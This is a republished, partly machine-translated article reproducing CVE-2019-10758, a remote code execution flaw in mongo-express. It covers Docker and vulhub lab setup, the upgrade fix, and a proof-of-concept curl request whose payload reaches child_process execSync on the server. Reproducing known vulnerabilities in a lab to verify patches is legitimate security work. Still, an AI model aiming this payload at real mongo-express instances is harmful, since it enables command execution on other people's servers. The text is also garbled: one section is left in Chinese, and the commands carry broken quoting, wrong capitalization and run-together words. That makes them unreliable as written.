Shulou(Shulou.com)06/01 Report--

Mongo-express remote code how to perform CVE-2019-10758 reproduction, in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and easy way.

About 0x01 Mongo-express is a database management tool for MongoDB, similar to the relationship between Navicat and Mysql. It uses a Web-based MongoDB graphical management interface written by Node.js,Express and Bootstrap3.

Overview of 0x02 vulnerabilities

The vulnerability lies in the toBSON () function in lib/bson.js, where the route / checkValid receives input from the outside and invokes code with a RCE vulnerability, resulting in a risk of exploitation.

0x03 affects version mongo-express

< 0.54.0 0x04 环境搭建 使用docker首先搭建MongoDB数据库 docker run --name MyMongo -d mongo:3.2 再搭建一个存在漏洞版本得express并连接到上面得MongoDB docker run -it --rm -p 8081:8081 --link MyMongo:mongo mongo-express:0.49 看到以下信息即可说明搭建成功 访问本机8081端口，可以看到Mongo-express界面

Of course, you can also use vulhub directly.

Git clone https://github.com/vulhub/vulhub.gitcd vulhub/mongo-express/CVE-2019-10758docker-compose up-d

Recurrence of 0x05 vulnerabilities

Use online Poc

Curl 'http://localhost:8081/checkValid'-H' Authorization: Basic YWRtaW46cGFzcw=='-- data 'document=this.constructor.constructor ("return process") (). MainModule.require ("child_process"). ExecSync ("echo Str1am > file.txt")'

If you see that Valid is returned and the MongoDB interface returns 200, it is a success.

View the files created

0x06 repair mode

Upgrade to version 0.54.0 or above

This is the answer to the question about how the Mongo-express remote code performs CVE-2019-10758 reproduction. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.